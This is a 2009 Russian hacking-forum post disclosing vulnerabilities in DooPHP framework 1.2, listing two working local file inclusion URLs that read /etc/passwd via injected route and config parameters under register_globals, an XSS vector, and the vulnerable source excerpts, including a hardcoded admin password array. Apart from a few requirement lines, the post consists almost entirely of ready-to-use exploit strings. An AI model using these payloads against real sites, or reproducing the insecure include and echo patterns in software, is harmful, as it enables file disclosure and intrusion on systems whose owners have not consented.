ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу DooPHP framework
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

DooPHP framework
  #1  
Старый 26.09.2009, 21:31
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию DooPHP framework
Сайт: http://www.doophp.com/
Версия: 1.2

LFI
Необходимо: register_globals = On
Код:
index.php/xek/?route[*][%2Fxek][]=../../../../../../../../etc/passwd%00&route[*][%2Fxek][]=index
Файл: ./protected/config/routes.conf.php
PHP код:
<?php
/**
 * Define your URI routes here.
 *
 * $route[Request Method][Uri] = array( Controller class, action method, other options, etc. )
 *
 * RESTful api support, *=any request method, GET PUT POST DELETE
 * POST     Create
 * GET      Read
 * PUT      Update, Create
 * DELETE     Delete
 *
 * Use lowercase for Request Method
 *
 * If you have your controller file name different from its class name, eg. home.php HomeController
 * $route['*']['/'] = array('HomeController', 'index', 'className'=>'HomeController');
 * 
 * If you need to reverse generate URL based on route ID with DooUrlBuilder in template view, please defined the id along with the routes
 * $route['*']['/'] = array('HomeController', 'index', 'id'=>'home');
 */
$admin = array('admin'=>'1234');
 
$route['*']['/'] = array('MainController''index');
...
LFI
Необходимо: register_globals = On
Неинициализированный индекс $config['ERROR_404_DOCUMENT'] (по дефолту строка закомментированна)
Код:
index.php/xek/?config[ERROR_404_DOCUMENT]=../../../../../../etc/passwd
Файл: dooframework/app/DooWebApp.php
PHP код:
...
if($code===404){
                    //Controller return 404, send 404 header, include file if ERROR_404_DOCUMENT is set by user
                    header('HTTP/1.1 404 Not Found');
                    if(!empty(Doo::conf()->ERROR_404_DOCUMENT)){
                        include Doo::conf()->SITE_PATH Doo::conf()->ERROR_404_DOCUMENT;
                    }
                    //execute route to handler 404 display if ERROR_404_ROUTE is defined, the route handler shouldn't send any headers or return 404
                    elseif(!empty(Doo::conf()->ERROR_404_ROUTE)){
                        $this->reroute(Doo::conf()->ERROR_404_ROUTEtrue);
                    }
                    exit;
                }
... 
XSS
Необходимо: register_globals = On
Код:
/protected/viewc/good.php?data[asd]=[xss payload]
Файл: protected/viewc/good.php
PHP код:
<?php

echo $data['asd'];
echo $this->gogo;
$this->inc('abc');
?>
__________________
включи голову
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Раздача Троя (Или Metasploit Framework часть 2) -=lebed=- Авторские статьи 38 19.05.2009 13:40
NET Framework Rootkits Fugitif Forum for discussion of ANTICHAT 0 21.04.2009 22:27
Учимся юзать консоль MSF 3.0 beta 3 (или Metasploit Framework часть 3) -=lebed=- Авторские статьи 37 02.04.2007 17:40
Метасплоит Framework v. 3.0 (описание) -=lebed=- Статьи 10 24.02.2007 02:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ